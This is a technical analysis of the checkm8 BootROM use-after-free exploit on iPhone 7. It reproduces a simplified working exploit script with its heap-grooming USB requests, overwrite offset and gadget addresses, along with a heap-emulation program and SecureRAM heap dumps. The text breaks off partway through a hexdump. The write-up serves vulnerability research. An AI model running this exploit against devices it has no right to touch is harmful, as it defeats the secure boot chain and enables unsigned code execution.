Technical analysis of the checkm8 exploit


    Most likely you've already heard about the famous exploit checkm8, which uses an unfixable vulnerability in the BootROM of most iDevices, including iPhone X. In this article, we'll provide a technical analysis of this exploit and figure out what causes the vulnerability.


    You can read the Russian version here.


    Introduction


    First, let's briefly describe the booting process of an iDevice and the role BootROM (a.k.a. SecureROM) plays in it. Detailed information about it can be found here. Here's what booting looks like:



    When the device is turned on, BootROM is executed first. Its main tasks are:


    • Platform initialization (necessary platform registers are installed, CPU is initialized, etc.)
    • Verification and transfer of control to the next stage
      • BootROM supports the parsing of IMG3/IMG4 images
      • BootROM has access to the GID key for decrypting images
      • for image verification, BootROM has a built-in public Apple key and necessary cryptographic functionality
    • Restore the device if further booting isn't possible (Device Firmware Update, DFU).

    BootROM has a very small size and can be called a light version of iBoot, as they share most of the system and library code. Although, unlike iBoot, BootROM cannot be updated. It is put in the internal read-only memory when a device is manufactured. BootROM is the hardware root of trust of the secure boot chain. BootROM vulnerabilities may allow an attacker to control the booting process and execute unsigned code on a device.



    The history of checkm8


    The checkm8 exploit was added to ipwndfu by its author axi0mX on September 27, 2019. At the same time, he announced the update on Twitter and provided a description and additional information about the exploit. According to the thread, he found the use-after-free vulnerability in the USB code while patch diffing iBoot for iOS 12 beta in the summer of 2018.
    BootROM and iBoot share most of their code, including USB, so this vulnerability is also relevant for BootROM.


    As follows from the exploit's code, the vulnerability is exploited in DFU. This is a mode in which one can transfer a signed image to a device via USB that will be booted later. For example, this can be useful for restoring a device after an unsuccessful update.


    On the same day, the user littlelailo said that he had found that vulnerability back in March and published a description in apollo.txt. The description corresponded with checkm8, although not all the details of the exploit become clear upon reading it. This is why we decided to write this article and describe all the details of exploitation up to the execution of the payload in BootROM.


    We based our analysis of the exploit on the resources mentioned above and the source code of iBoot/SecureROM, which was leaked in February 2018. We also used the data we got from the experiments done on our test device, iPhone 7 (CPID:8010). Using, checkm8, we got the dumps of SecureROM and SecureRAM, which were also helpful for the analysis.


    Necessary info about USB


    Since the vulnerability is in the USB code, it is necessary to understand how this interface works. Full specs can be found at https://www.usb.org/, but it's a long read. For our purposes, USB in a NutShell is more than enough. Here, we'll mention only the most relevant points.


    There are various types of USB data transfer. In DFU, only Control Transfers mode is used (read more about it here). In this mode, each transaction has 3 stages:



    • Setup Stage — a SETUP packet is sent; it has the following fields:
      • bmRequestType — defines the direction of the request, its type, and the recipient
      • bRequest — defines the request to be made
      • wValue, wIndex — are interpreted depending on the request
      • wLength — specifies the length of the sent/received data in Data Stage
    • Data Stage — an optional stage of data transfer. Depending on the SETUP packet sent during the Setup Stage, the data can be sent from host to device (OUT) or vice versa (IN). The data is sent in small portions (in case of Apple DFU, it's 0x40 bytes).
      • When a host wants to send another portion of data, it sends an OUT token and then the data itself.
      • When a host is ready to receive data from a device, it sends an IN token to the device.
    • Status Stage — the last stage; the status of the whole transaction is reported.
      • For OUT requests, the host sends an IN token to which the device must respond with a zero-length packet.
      • For IN requests, the host sends an OUT token and a zero-length packet.

    The scheme below shows OUT and IN requests. We took out ACK, NACK, and other handshake packets on purpose, as they are not important for the exploit itself.



    Analysis of apollo.txt


    We began the analysis with the vulnerability from apollo.txt. The document describes the algorithm of the DFU mode:


    https://gist.github.com/littlelailo/42c6a11d31877f98531f6d30444f59c4
    1. When usb is started to get an image over dfu, dfu registers an interface to handle all the commands and allocates a buffer for input and output
    2. if you send data to dfu the setup packet is handled by the main code which then calls out to the interface code
    3. the interface code verifies that wLength is shorter than the input output buffer length and if that's the case it updates a pointer passed as an argument with a pointer to the input output buffer
    4. it then returns wLength which is the length it wants to recieve into the buffer
    5. the usb main code then updates a global var with the length and gets ready to recieve the data packages
    6. if a data package is recieved it gets written to the input output buffer via the pointer which was passed as an argument and another global variable is used to keep track of how many bytes were recieved already
    7. if all the data was recieved the dfu specific code is called again and that then goes on to copy the contents of the input output buffer to the memory location from where the image is later booted
    8. after that the usb code resets all variables and goes on to handel new packages
    9. if dfu exits the input output buffer is freed and if parsing of the image fails bootrom reenters dfu

    First, we checked these steps against the source code of iBoot. We can't use the fragments of the leaked code here, so we'll use pseudocode we got from reverse-engineering the SecureROM of our iPhone7 in IDA. You can easily find the source code of iBoot and navigate it.


    When DFU is initialized, an IO buffer is allocated, and a USB interface for processing the requests to DFU is registered:



    When the SETUP packet of a request to DFU comes in, a proper interface handler is called. For OUT requests (e.g., when an image is sent), in case of successful execution, the handler has to return the address of the IO buffer for the transaction as well as the length of data it expects to receive. Both values are stored in global variables.



    The screenshot below shows the DFU interface handler. If a request is correct, then the address of the IO buffer allocated during the DFU initialization and the expected length of data from the SETUP packet are returned.



    During the Data Stage, each portion of data is written to the IO buffer, and then the IO buffer address is offset and the received counter is updated. When all expected data is received, the interface data handler is called and the global state of the transaction is cleared.



    In the DFU data handler, the received data is moved to the memory area from which it will be loaded later. Based on the source code of iBoot, this area on Apple devices is called INSECURE_MEMORY.



    When the device exits the DFU mode, the previously allocated IO buffer is freed. If the image was successfully acquired in the DFU mode, it will be verified and booted. If there was any error or it was impossible to boot the image, the DFU will be initialized again, and the whole process will repeat from the beginning.


    The described algorithm has a use-after-free vulnerability. If we send a SETUP packet at the time of image uploading and complete the transaction skipping Data Stage, the global state will remain initialized during the next DFU cycle, and we will be able to write to the address of the IO buffer allocated during the previous iteration of DFU.


    Now that we know how use-after-free works, the question is, how can we overwrite anything during the next iteration of the DFU? Before another initialization of the DFU, all the previously allocated resources are freed and the allocation of memory in a new iteration has to be exactly the same. As it turned out, there's another interesting memory leak error that allows exploiting use-after-free.


    Analysis of checkm8


    Let's get to checkm8 itself. For the sake of demonstration, we'll use a simplified version of the exploit for iPhone 7, where we took out all code related to other platforms and changed the order and types of USB requests without any damage to its functionality. We also got rid of the process of building a payload, which can be found in the original file, checkm8.py. It's easy to spot the differences between the versions for other devices.


    #!/usr/bin/env python
    
    from checkm8 import *
    
    def main():
        print '*** checkm8 exploit by axi0mX ***'
    
        device = dfu.acquire_device(1800)
        start = time.time()
        print 'Found:', device.serial_number
        if 'PWND:[' in device.serial_number:
            print 'Device is already in pwned DFU Mode. Not executing exploit.'
            return
    
        payload, _ = exploit_config(device.serial_number)
        t8010_nop_gadget = 0x10000CC6C
        callback_chain = 0x1800B0800
        t8010_overwrite = '\0' * 0x5c0
        t8010_overwrite += struct.pack('<32x2Q', t8010_nop_gadget, callback_chain)
    
        # heap feng-shui
        stall(device)
        leak(device)
        for i in range(6):
            no_leak(device)
        dfu.usb_reset(device)
        dfu.release_device(device)
    
        # set global state and restart usb
        device = dfu.acquire_device()
        device.serial_number
        libusb1_async_ctrl_transfer(device, 0x21, 1, 0, 0, 'A' * 0x800, 0.0001)
        libusb1_no_error_ctrl_transfer(device, 0x21, 4, 0, 0, 0, 0)
        dfu.release_device(device)
    
        time.sleep(0.5)
    
        # heap occupation
        device = dfu.acquire_device()
        device.serial_number
        stall(device)
        leak(device)
        leak(device)
        libusb1_no_error_ctrl_transfer(device, 0, 9, 0, 0, t8010_overwrite, 50)
        for i in range(0, len(payload), 0x800):
            libusb1_no_error_ctrl_transfer(device, 0x21, 1, 0, 0,
                                           payload[i:i+0x800], 50)
        dfu.usb_reset(device)
        dfu.release_device(device)
    
        device = dfu.acquire_device()
        if 'PWND:[checkm8]' not in device.serial_number:
            print 'ERROR: Exploit failed. Device did not enter pwned DFU Mode.'
            sys.exit(1)
        print 'Device is now in pwned DFU Mode.'
        print '(%0.2f seconds)' % (time.time() - start)
        dfu.release_device(device)
    
    if __name__ == '__main__':
        main()

    The operation of checkm8 has several stages:


    1. Heap feng-shui
    2. Allocation and freeing of the IO buffer without clearing the global state
    3. Overwriting usb_device_io_request in the heap with use-after-free
    4. Placing the payload
    5. Execution of callback-chain
    6. Execution of shellcode

    Let's look at all stages in detail.


    1. Heap feng-shui


    We think it's the most interesting stage, so we'll spend more time describing it.


    stall(device)
    leak(device)
    for i in range(6):
        no_leak(device)
    dfu.usb_reset(device)
    dfu.release_device(device)

    This stage is necessary for arranging the heap in a way that is beneficial for the exploitation of use-after-free. First, let's consider the calls stall, leak, no_leak:


    def stall(device):   libusb1_async_ctrl_transfer(device, 0x80, 6, 0x304, 0x40A, 'A' * 0xC0, 0.00001)
    def leak(device):    libusb1_no_error_ctrl_transfer(device, 0x80, 6, 0x304, 0x40A, 0xC0, 1)
    def no_leak(device): libusb1_no_error_ctrl_transfer(device, 0x80, 6, 0x304, 0x40A, 0xC1, 1)

    libusb1_no_error_ctrl_transfer is a wrapper for device.ctrlTransfer ignoring all exceptions arising during the execution of a request. libusb1_async_ctrl_transfer is a wrapper for the libusb_submit_transfer function from libusb for the asynchronous execution of a reqeust.


    The following parameters are passed to these calls:


    • Device number
    • Data for the SETUP packet (here you can find the description):
      • bmRequestType
      • bRequest
      • wValue
      • wIndex
    • Length of data (wLength) or data for the Data Stage
    • Request timeout

    Arguments bmRequestType, bRequest, wValue, and wIndex are shared by all three request types:


    • bmRequestType = 0x80
      • 0b1XXXXXXX — direction of Data Stage (Device to Host)
      • 0bX00XXXXX — standard request type
      • 0bXXX00000 — device is the recipient of the request
    • bRequest = 6 — request to get a descriptor (GET_DESCRIPTOR)
    • wValue = 0x304
      • wValueHigh = 0x3 — defines the type of the descriptor — string (USB_DT_STRING)
      • wValueLow = 0x4 — index of the string descriptor, 4, corresponds to the device serial number (in this case, the string is CPID:8010 CPRV:11 CPFM:03 SCEP:01 BDID:0C ECID:001A40362045E526 IBFL:3C SRTG:[iBoot-2696.0.0.1.33])
    • wIndex = 0x40A — the indentifer of the string's language, whose value is not relevant to exploitation and can be changed.

    For any of these requests, 0x30 bytes are allocated in the heap for an object of the following structure:



    The most interesting fields of this object are callback and next.


    • callback is the pointer to the function that will be called when the request is done.
    • next is the pointer to the next object of the same type; it is necessary for organizing the request queue.

    The key feature of stall is its use of asynchronous execution of a request with a minimum timeout. That is why, if we are lucky, the request will be canceled on the OS level and remain in the execution queue, and the transaction won't be complete. Plus, the device will continue receiving all the upcoming SETUP packets and place them, when necessary, in the execution queue. Later, experimenting with the USB controller on Arduino, we found out that for successful exploitation we need the host to send a SETUP packet and an IN token, after which the transaction has to be canceled due to timeout. This incomplete transaction looks like this:



    Besides that, the requests only differ in length by one unit. For standard requests, there is a standard callback that looks like this:



    The value of io_length is equal to the minimum from wLength in the request's SETUP packet and the original length of the requested descriptor. Due to the descriptor being quite long, we can control the value of io_length within its length. The value of g_setup_request.wLength is equal to the value of wLength from the last SETUP packet. In this case, it's 0xC1.


    Thus, the requests formed by the calls stall and leak are completed, the condition in the terminal callback function is satisfied, and usb_core_send_zlp() is called. This call creates a null packet (zero-length-packet) and adds it to the execution queue. This is necessary for the correct completion of the transaction in Status Stage.


    The request is completed by calling the function usb_core_complete_endpoint_io. First, it calls callback and then frees the request's memory. The request is complete not only when the whole transaction is complete, but also when USB is reset. When the signal for resetting USB is received, all the requests in the execution queue will be completed.


    By selectively calling usb_core_send_zlp() when going through the execution queue and freeing the requests afterward, we can gain sufficient control over the heap for the exploitation of use-after-free. First, let's look at the request cleanup loop:



    As you can see, the queue is emptied, and then the canceled requests are run and completed by usb_core_complete_endpoint_io. The requests allocated by usb_core_send_zlp are placed into ep->io_head. After the USB reset is done, all information about the endpoint will be clear, including the pointers io_head and io_tail, and the zero-length requests will remain in the heap. Thus, we can create a small chunk amidst the heap. The scheme below shows how it's done:



    In the heap of SecureROM, a new memory area is allocated from the smallest proper free chunk. By creating a small free chunk using the method described above, we can control the allocation of memory during the USB initialization, including the allocation of the io_buffer and requests.


    To have a better understanding of this, let's see which requests to the heap are made when DFU is initialized. During the analysis of the iBoot source code and reverse-engineering of SecureROM, we got the following sequence:


      1. Allocation of various string descriptors
        • 1.1. Nonce (size 234)
        • 1.2. Manufacturer (22)
        • 1.3. Product (62)
        • 1.4. Serial Number (198)
        • 1.5. Configuration string (62)

      1. Allocations related to the creation of the USB controller task
        • 2.1. Task structure (0x3c0)
        • 2.2. Task stack (0x1000)

      1. io_buffer (0x800)

      1. Configuration descriptors
        • 4.1. High-Speed (25)
        • 4.2. Full-Speed (25)


    Then, request structures are allocated. If there's a small chunk in the heap, some allocations of the first category will go there, and all other allocations will move. Thus, we will be able to overflow usb_device_io_request by referring to the old buffer. It looks like this:



    To calculate the necessary offset, we simply emulated all the allocations listed above and adapted the source code of the iBoot heap a little.


    Emulating requests to the heap in DFU
    #include "heap.h"
    #include <stdio.h>
    #include <unistd.h>
    #include <sys/mman.h>
    
    #ifndef NOLEAK
    #define NOLEAK (8)
    #endif
    
    int main() {
        void * chunk = mmap((void *)0x1004000, 0x100000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        printf("chunk = %p\n", chunk);
        heap_add_chunk(chunk, 0x100000, 1);
        malloc(0x3c0); // alignment of the low order bytes of addresses in SecureRAM
    
        void * descs[10];
        void * io_req[100];
        descs[0] = malloc(234);
        descs[1] = malloc(22);
        descs[2] = malloc(62);
        descs[3] = malloc(198);
        descs[4] = malloc(62);
    
        const int N = NOLEAK;
    
        void * task = malloc(0x3c0);
        void * task_stack = malloc(0x4000);
    
        void * io_buf_0 = memalign(0x800, 0x40);
        void * hs = malloc(25);
        void * fs = malloc(25);
    
        void * zlps[2];
    
        for(int i = 0; i < N; i++)
        {
            io_req[i] = malloc(0x30);
        }
    
        for(int i = 0; i < N; i++)
        {
            if(i < 2)
            {
                zlps[i] = malloc(0x30);
            }
            free(io_req[i]);
        }
    
        for(int i = 0; i < 5; i++)
        {
           printf("descs[%d]  = %p\n", i, descs[i]);
        }
    
        printf("task = %p\n", task);
        printf("task_stack = %p\n", task_stack);
        printf("io_buf = %p\n", io_buf_0);
        printf("hs = %p\n", hs);
        printf("fs = %p\n", fs);
    
        for(int i = 0; i < 2; i++)
        {
           printf("zlps[%d]  = %p\n", i, zlps[i]);
        }
    
        printf("**********\n");
    
        for(int i = 0; i < 5; i++)
        {
            free(descs[i]);
        }
    
        free(task);
        free(task_stack);
        free(io_buf_0);
        free(hs);
        free(fs);
    
        descs[0] = malloc(234);
        descs[1] = malloc(22);
        descs[2] = malloc(62);
        descs[3] = malloc(198);
        descs[4] = malloc(62);
    
        task = malloc(0x3c0);
        task_stack = malloc(0x4000);
        void * io_buf_1 = memalign(0x800, 0x40);
        hs = malloc(25);
        fs = malloc(25);
    
        for(int i = 0; i < 5; i++)
        {
           printf("descs[%d]  = %p\n", i, descs[i]);
        }
    
        printf("task = %p\n", task);
        printf("task_stack = %p\n", task_stack);
        printf("io_buf = %p\n", io_buf_1);
        printf("hs = %p\n", hs);
        printf("fs = %p\n", fs);
    
        for(int i = 0; i < 5; i++)
        {
            io_req[i] = malloc(0x30);
            printf("io_req[%d] = %p\n", i, io_req[i]);
        }
    
        printf("**********\n");
        printf("io_req_off = %#lx\n", (int64_t)io_req[0] - (int64_t)io_buf_0);
        printf("hs_off  = %#lx\n", (int64_t)hs - (int64_t)io_buf_0);
        printf("fs_off  = %#lx\n", (int64_t)fs - (int64_t)io_buf_0);
    
        return 0;
    }

    The output of the program with 8 requests at the heap feng-shui stage:


    chunk = 0x1004000
    descs[0]  = 0x1004480
    descs[1]  = 0x10045c0
    descs[2]  = 0x1004640
    descs[3]  = 0x10046c0
    descs[4]  = 0x1004800
    task = 0x1004880
    task_stack = 0x1004c80
    io_buf = 0x1008d00
    hs = 0x1009540
    fs = 0x10095c0
    zlps[0]  = 0x1009a40
    zlps[1]  = 0x1009640
    **********
    descs[0]  = 0x10096c0
    descs[1]  = 0x1009800
    descs[2]  = 0x1009880
    descs[3]  = 0x1009900
    descs[4]  = 0x1004480
    task = 0x1004500
    task_stack = 0x1004900
    io_buf = 0x1008980
    hs = 0x10091c0
    fs = 0x1009240
    io_req[0] = 0x10092c0
    io_req[1] = 0x1009340
    io_req[2] = 0x10093c0
    io_req[3] = 0x1009440
    io_req[4] = 0x10094c0
    **********
    io_req_off = 0x5c0
    hs_off  = 0x4c0
    fs_off  = 0x540

    As you can see, another usb_device_io_request will appear at the offset of 0x5c0 from the beginning of the previous buffer, which corresponds to the exploit's code:


    t8010_overwrite = '\0' * 0x5c0
    t8010_overwrite += struct.pack('<32x2Q', t8010_nop_gadget, callback_chain)

    You can check the validity of these conclusions by analyzing the current status of the SecureRAM heap, which we got with checkm8. For this purpose, we wrote a simple script that parses the heap's dump and enumerates the chunks. Keep in mind that during the usb_device_io_request overflow, part of the metadata was damaged, so we skip it during the analysis.


    #!/usr/bin/env python3
    
    import struct
    from hexdump import hexdump
    
    with open('HEAP', 'rb') as f:
        heap = f.read()
    
    cur = 0x4000
    
    def parse_header(cur):
        _, _, _, _, this_size, t = struct.unpack('<QQQQQQ', heap[cur:cur + 0x30])
        is_free = t & 1
        prev_free = (t >> 1) & 1
        prev_size = t >> 2
        this_size *= 0x40
        prev_size *= 0x40
        return this_size, is_free, prev_size, prev_free
    
    while True:
        try:
            this_size, is_free, prev_size, prev_free = parse_header(cur)
        except Exception as ex:
            break
        print('chunk at', hex(cur + 0x40))
        if this_size == 0:
            if cur in (0x9180, 0x9200, 0x9280):  # skipping damaged chunks
                this_size = 0x80
            else:
                break
        print(hex(this_size), 'free' if is_free else 'non-free', hex(prev_size), prev_free)
        hexdump(heap[cur + 0x40:cur + min(this_size, 0x100)])
        cur += this_size

    The output of the script with comments can be found under the spoiler. You can see that the low order bytes match the results of emulation.


    The result of parsing the heap in SecureRAM
    chunk at 0x4040
    0x40 non-free 0x0 0
    chunk at 0x4080
    0x80 non-free 0x40 0
    00000000: 00 41 1B 80 01 00 00 00  00 00 00 00 00 00 00 00  .A..............
    00000010: 00 00 00 00 00 00 00 00  00 01 00 00 00 00 00 00  ................
    00000020: FF 00 00 00 00 00 00 00  68 3F 08 80 01 00 00 00  ........h?......
    00000030: F0 F1 F2 F3 F4 F5 F6 F7  F8 F9 FA FB FC FD FE FF  ................
    chunk at 0x4100
    0x140 non-free 0x80 0
    00000000: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000010: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000020: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000030: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000040: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000050: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000060: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000070: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000080: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000090: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    000000A0: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    000000B0: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    chunk at 0x4240
    0x240 non-free 0x140 0
    00000000: 68 6F 73 74 20 62 72 69  64 67 65 00 00 00 00 00  host bridge.....
    00000010: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000020: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000030: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000040: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000050: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000060: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000070: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000080: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000090: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    000000A0: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    000000B0: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    chunk at 0x4480  // descs[4], conf string
    0x80 non-free 0x240 0
    00000000: 3E 03 41 00 70 00 70 00  6C 00 65 00 20 00 4D 00  >.A.p.p.l.e. .M.
    00000010: 6F 00 62 00 69 00 6C 00  65 00 20 00 44 00 65 00  o.b.i.l.e. .D.e.
    00000020: 76 00 69 00 63 00 65 00  20 00 28 00 44 00 46 00  v.i.c.e. .(.D.F.
    00000030: 55 00 20 00 4D 00 6F 00  64 00 65 00 29 00 FE FF  U. .M.o.d.e.)...
    chunk at 0x4500  // task
    0x400 non-free 0x80 0
    00000000: 6B 73 61 74 00 00 00 00  E0 01 08 80 01 00 00 00  ksat............
    00000010: E8 83 08 80 01 00 00 00  00 00 00 00 00 00 00 00  ................
    00000020: 00 00 00 00 00 00 00 00  02 00 00 00 00 00 00 00  ................
    00000030: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000040: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000050: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000060: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000070: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000080: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000090: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    000000A0: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    000000B0: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    chunk at 0x4900  // task stack
    0x4080 non-free 0x400 0
    00000000: 6B 61 74 73 6B 61 74 73  6B 61 74 73 6B 61 74 73  katskatskatskats
    00000010: 6B 61 74 73 6B 61 74 73  6B 61 74 73 6B 61 74 73  katskatskatskats
    00000020: 6B 61 74 73 6B 61 74 73  6B 61 74 73 6B 61 74 73  katskatskatskats
    00000030: 6B 61 74 73 6B 61 74 73  6B 61 74 73 6B 61 74 73  katskatskatskats
    00000040: 6B 61 74 73 6B 61 74 73  6B 61 74 73 6B 61 74 73  katskatskatskats
    00000050: 6B 61 74 73 6B 61 74 73  6B 61 74 73 6B 61 74 73  katskatskatskats
    00000060: 6B 61 74 73 6B 61 74 73  6B 61 74 73 6B 61 74 73  katskatskatskats
    00000070: 6B 61 74 73 6B 61 74 73  6B 61 74 73 6B 61 74 73  katskatskatskats
    00000080: 6B 61 74 73 6B 61 74 73  6B 61 74 73 6B 61 74 73  katskatskatskats
    00000090: 6B 61 74 73 6B 61 74 73  6B 61 74 73 6B 61 74 73  katskatskatskats
    000000A0: 6B 61 74 73 6B 61 74 73  6B 61 74 73 6B 61 74 73  katskatskatskats
    000000B0: 6B 61 74 73 6B 61 74 73  6B 61 74 73 6B 61 74 73  katskatskatskats
    chunk at 0x8980  // io_buf
    0x840 non-free 0x4080 0
    00000000: 63 6D 65 6D 63 6D 65 6D  00 00 00 00 00 00 00 00  cmemcmem........
    00000010: 10 00 0B 80 01 00 00 00  00 00 1B 80 01 00 00 00  ................
    00000020: EF FF 00 00 00 00 00 00  10 08 0B 80 01 00 00 00  ................
    00000030: 4C CC 00 00 01 00 00 00  20 08 0B 80 01 00 00 00  L....... .......
    00000040: 4C CC 00 00 01 00 00 00  30 08 0B 80 01 00 00 00  L.......0.......
    00000050: 4C CC 00 00 01 00 00 00  40 08 0B 80 01 00 00 00  L.......@.......
    00000060: 4C CC 00 00 01 00 00 00  A0 08 0B 80 01 00 00 00  L...............
    00000070: 00 06 0B 80 01 00 00 00  6C 04 00 00 01 00 00 00  ........l.......
    00000080: 00 00 00 00 00 00 00 00  78 04 00 00 01 00 00 00  ........x.......
    00000090: 00 00 00 00 00 00 00 00  B8 A4 00 00 01 00 00 00  ................
    000000A0: 00 00 0B 80 01 00 00 00  E4 03 00 00 01 00 00 00  ................
    000000B0: 00 00 00 00 00 00 00 00  34 04 00 00 01 00 00 00  ........4.......
    chunk at 0x91c0  // hs config
    0x80 non-free 0x0 0
    00000000: 09 02 19 00 01 01 05 80  FA 09 04 00 00 00 FE 01  ................
    00000010: 00 00 07 21 01 0A 00 00  08 00 00 00 00 00 00 00  ...!............
    00000020: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000030: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    chunk at 0x9240  // ls config
    0x80 non-free 0x0 0
    00000000: 09 02 19 00 01 01 05 80  FA 09 04 00 00 00 FE 01  ................
    00000010: 00 00 07 21 01 0A 00 00  08 00 00 00 00 00 00 00  ...!............
    00000020: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000030: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    chunk at 0x92c0
    0x80 non-free 0x0 0
    00000000: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000010: 01 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000020: 6C CC 00 00 01 00 00 00  00 08 0B 80 01 00 00 00  l...............
    00000030: F0 F1 F2 F3 F4 F5 F6 F7  F8 F9 FA FB FC FD FE FF  ................
    chunk at 0x9340
    0x80 non-free 0x80 0
    00000000: 80 00 00 00 00 00 00 00  00 89 08 80 01 00 00 00  ................
    00000010: FF FF FF FF C0 00 00 00  00 00 00 00 00 00 00 00  ................
    00000020: 48 DE 00 00 01 00 00 00  C0 93 1B 80 01 00 00 00  H...............
    00000030: F0 F1 F2 F3 F4 F5 F6 F7  F8 F9 FA FB FC FD FE FF  ................
    chunk at 0x93c0
    0x80 non-free 0x80 0
    00000000: 80 00 00 00 00 00 00 00  00 89 08 80 01 00 00 00  ................
    00000010: FF FF FF FF 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000020: 00 00 00 00 00 00 00 00  40 94 1B 80 01 00 00 00  ........@.......
    00000030: F0 F1 F2 F3 F4 F5 F6 F7  F8 F9 FA FB FC FD FE FF  ................
    chunk at 0x9440
    0x80 non-free 0x80 0
    00000000: 80 00 00 00 00 00 00 00  00 89 08 80 01 00 00 00  ................
    00000010: FF FF FF FF 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000020: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000030: F0 F1 F2 F3 F4 F5 F6 F7  F8 F9 FA FB FC FD FE FF  ................
    chunk at 0x94c0
    0x180 non-free 0x80 0
    00000000: E4 03 43 00 50 00 49 00  44 00 3A 00 38 00 30 00  ..C.P.I.D.:.8.0.
    00000010: 31 00 30 00 20 00 43 00  50 00 52 00 56 00 3A 00  1.0. .C.P.R.V.:.
    00000020: 31 00 31 00 20 00 43 00  50 00 46 00 4D 00 3A 00  1.1. .C.P.F.M.:.
    00000030: 30 00 33 00 20 00 53 00  43 00 45 00 50 00 3A 00  0.3. .S.C.E.P.:.
    00000040: 30 00 31 00 20 00 42 00  44 00 49 00 44 00 3A 00  0.1. .B.D.I.D.:.
    00000050: 30 00 43 00 20 00 45 00  43 00 49 00 44 00 3A 00  0.C. .E.C.I.D.:.
    00000060: 30 00 30 00 31 00 41 00  34 00 30 00 33 00 36 00  0.0.1.A.4.0.3.6.
    00000070: 32 00 30 00 34 00 35 00  45 00 35 00 32 00 36 00  2.0.4.5.E.5.2.6.
    00000080: 20 00 49 00 42 00 46 00  4C 00 3A 00 33 00 43 00   .I.B.F.L.:.3.C.
    00000090: 20 00 53 00 52 00 54 00  47 00 3A 00 5B 00 69 00   .S.R.T.G.:.[.i.
    000000A0: 42 00 6F 00 6F 00 74 00  2D 00 32 00 36 00 39 00  B.o.o.t.-.2.6.9.
    000000B0: 36 00 2E 00 30 00 2E 00  30 00 2E 00 31 00 2E 00  6...0...0...1...
    chunk at 0x9640  // zlps[1]
    0x80 non-free 0x180 0
    00000000: 80 00 00 00 00 00 00 00  00 89 08 80 01 00 00 00  ................
    00000010: FF FF FF FF 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000020: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000030: F0 F1 F2 F3 F4 F5 F6 F7  F8 F9 FA FB FC FD FE FF  ................
    chunk at 0x96c0  // descs[0], Nonce
    0x140 non-free 0x80 0
    00000000: EA 03 20 00 4E 00 4F 00  4E 00 43 00 3A 00 35 00  .. .N.O.N.C.:.5.
    00000010: 35 00 46 00 38 00 43 00  41 00 39 00 37 00 41 00  5.F.8.C.A.9.7.A.
    00000020: 46 00 45 00 36 00 30 00  36 00 43 00 39 00 41 00  F.E.6.0.6.C.9.A.
    00000030: 41 00 31 00 31 00 32 00  44 00 38 00 42 00 37 00  A.1.1.2.D.8.B.7.
    00000040: 43 00 46 00 33 00 35 00  30 00 46 00 42 00 36 00  C.F.3.5.0.F.B.6.
    00000050: 35 00 37 00 36 00 43 00  41 00 41 00 44 00 30 00  5.7.6.C.A.A.D.0.
    00000060: 38 00 43 00 39 00 35 00  39 00 39 00 34 00 41 00  8.C.9.5.9.9.4.A.
    00000070: 46 00 32 00 34 00 42 00  43 00 38 00 44 00 32 00  F.2.4.B.C.8.D.2.
    00000080: 36 00 37 00 30 00 38 00  35 00 43 00 31 00 20 00  6.7.0.8.5.C.1. .
    00000090: 53 00 4E 00 4F 00 4E 00  3A 00 42 00 42 00 41 00  S.N.O.N.:.B.B.A.
    000000A0: 30 00 41 00 36 00 46 00  31 00 36 00 42 00 35 00  0.A.6.F.1.6.B.5.
    000000B0: 31 00 37 00 45 00 31 00  44 00 33 00 39 00 32 00  1.7.E.1.D.3.9.2.
    chunk at 0x9800  // descs[1], Manufacturer
    0x80 non-free 0x140 0
    00000000: 16 03 41 00 70 00 70 00  6C 00 65 00 20 00 49 00  ..A.p.p.l.e. .I.
